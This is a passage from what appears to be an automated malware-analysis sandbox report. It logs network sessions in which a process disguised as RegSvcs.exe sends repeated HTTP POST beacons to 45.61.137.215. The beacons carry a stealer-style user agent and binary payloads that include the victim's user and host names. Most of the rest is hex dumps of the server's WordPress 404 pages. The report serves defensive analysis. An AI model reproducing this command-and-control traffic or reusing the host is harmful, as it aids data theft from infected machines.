65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:42:55.411254883 CEST	224	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
May 29, 2024 15:42:55.411458015 CEST	1236	IN	Data Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
May 29, 2024 15:42:55.411468983 CEST	1236	IN	Data Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
May 29, 2024 15:42:55.411509037 CEST	1236	IN	Data Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
May 29, 2024 15:42:55.411528111 CEST	672	IN	Data Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30 Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
May 29, 2024 15:42:55.411976099 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:42:55.412039995 CEST	224	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
May 29, 2024 15:42:55.412049055 CEST	1236	IN	Data Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5
May 29, 2024 15:42:55.412059069 CEST	1236	IN	Data Raw: 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 Data Ascii: --black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.9	49731	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:42:55.680526018 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:42:55.685503006 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:42:58.199522972 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:42:56 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:42:58.199584007 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:42:58.199594021 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:42:58.199604988 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 29, 2024 15:42:58.199615002 CEST	896	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 29, 2024 15:42:58.199671984 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:42:58.199686050 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 29, 2024 15:42:58.199697971 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 29, 2024 15:42:58.199870110 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
May 29, 2024 15:42:58.199879885 CEST	224	IN	Data Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.9	49732	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:42:58.351208925 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:42:58.356198072 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:43:00.920340061 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:42:58 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:43:00.920352936 CEST	224	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
May 29, 2024 15:43:00.920371056 CEST	1236	IN	Data Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
May 29, 2024 15:43:00.920382023 CEST	1236	IN	Data Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
May 29, 2024 15:43:00.920449018 CEST	1236	IN	Data Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
May 29, 2024 15:43:00.920459032 CEST	1236	IN	Data Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30 Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
May 29, 2024 15:43:00.920469046 CEST	1236	IN	Data Raw: 67 72 61 64 69 65 6e 74 2d 2d 63 6f 6f 6c 2d 74 6f 2d 77 61 72 6d 2d 73 70 65 63 74 72 75 6d 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 37 34 2c 32 33 34 2c 32 32 30 29 20 30 25 2c 72 67 62 28 31 35 31 Data Ascii: gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135de
May 29, 2024 15:43:00.920485020 CEST	1120	IN	Data Raw: 38 30 3a 20 35 2e 30 36 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 6e 61 74 75 72 61 6c 3a 20 36 70 78 20 36 70 78 20 39 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 32 29 3b 2d 2d 77 70 2d 2d 70 72 Data Ascii: 80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3p
May 29, 2024 15:43:00.920576096 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
May 29, 2024 15:43:00.920586109 CEST	1236	IN	Data Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.9	49734	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:43:01.102766037 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:43:01.107916117 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
